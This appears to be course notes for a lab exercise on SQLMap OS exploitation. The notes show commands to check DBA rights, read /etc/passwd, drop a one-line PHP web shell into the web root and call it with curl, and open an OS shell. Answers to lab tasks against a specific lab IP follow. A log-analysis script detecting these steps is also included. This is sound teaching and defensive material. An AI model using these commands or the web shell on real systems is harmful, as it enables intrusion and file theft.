🎡OS Exploitation

SQLMap can attempt to give us direct command execution on the remote host if we have the proper privileges.

We must have the LOAD DATA and INSERT privileges to be able to load the contents of a file into a table and then read that table, for example:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;

DBA Privileges

To check whether we have DBA privileges with SQLMap, we can use the --is-dba option:

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

If the output reports current user is DBA: True, we may have the privilege to read local files.

Reading Local Files

To read a local file from the remote host, we can use the --file-read option:

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

SQLMap saves the retrieved file to a local output file that we can cat later on.

Writing Local Files

This is heavily restricted in modern DBMSes, since it can be used to write a web shell on the remote server.

To write files to the remote server, we can use the --file-write and --file-dest options:

echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
curl http://www.example.com/shell.php?cmd=ls+-la

OS Command Execution

To get an interactive OS shell on the remote host, we can use the --os-shell option:

sqlmap -u "http://www.example.com/?id=1" --os-shell

If this fails, we can try another injection technique, such as error-based SQL injection, which we can specify with --technique=E:

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E
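The --file-write and --os-shell chains above leave a recognisable trail in the web server's access log. As an added example (not part of the original notes), the Python script below runs over constructed Apache log lines and flags the MySQL file I/O primitives those options rely on, a sqlmap user agent, and any later request to a file that an INTO OUTFILE statement tried to create, which is the write-then-execute sequence shown above.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed Apache combined-format log lines (not real traffic): a benign request,
# a LOAD_FILE read, an INTO OUTFILE write of shell.php, then a hit on that shell.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /case1.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:12:00:02 +0000] "GET /case1.php?id=1%20UNION%20SELECT%20LOAD_FILE(%27/etc/passwd%27),NULL HTTP/1.1" 200 2048 "-" "sqlmap/1.7"
10.0.0.9 - - [10/May/2024:12:00:03 +0000] "GET /case1.php?id=1%20UNION%20SELECT%20NULL,NULL%20INTO%20OUTFILE%20%27/var/www/html/shell.php%27 HTTP/1.1" 200 300 "-" "sqlmap/1.7"
10.0.0.9 - - [10/May/2024:12:00:04 +0000] "GET /shell.php?cmd=ls+-la HTTP/1.1" 200 900 "-" "curl/8.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# MySQL primitives behind --file-read (LOAD_FILE) and --file-write / --os-shell (INTO OUTFILE/DUMPFILE)
FILE_IO_RE = re.compile(r"load_file\s*\(|into\s+(?:out|dump)file\s+'(?P<path>[^']+)'", re.I)


def analyze(log_text):
    """Return [(ip, path, [reasons])] for every log line worth alerting on."""
    findings = []
    written = set()  # basenames of files an INTO OUTFILE/DUMPFILE tried to create
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip
        parts = urlsplit(unquote_plus(m["target"]))
        reasons = []
        if m["ua"].lower().startswith("sqlmap"):
            reasons.append("sqlmap-user-agent")
        for io in FILE_IO_RE.finditer(parts.query):
            reasons.append("sql-file-io")
            if io["path"]:  # remember what the attacker tried to write
                written.add(io["path"].rsplit("/", 1)[-1])
        if parts.path.rsplit("/", 1)[-1] in written:
            reasons.append("request-to-file-written-via-sqli")
        if "cmd" in parse_qs(parts.query):
            reasons.append("cmd-parameter")
        if reasons:
            findings.append((m["ip"], parts.path, reasons))
    return findings


if __name__ == "__main__":
    for ip, path, reasons in analyze(SAMPLE_LOG):
        print(f"{ip} {path} {', '.join(reasons)}")
```

Correlating the INTO OUTFILE path with later requests is what separates a real web shell drop from noisy scanner traffic, so that reason deserves the highest severity.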

Try to use SQLMap to read the file "/var/www/html/flag.txt".

sqlmap http://94.237.59.63:39959/?id=1 --file-read "/var/www/html/flag.txt" --dump --batch

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

sqlmap http://94.237.59.63:39959/?id=1 --os-shell
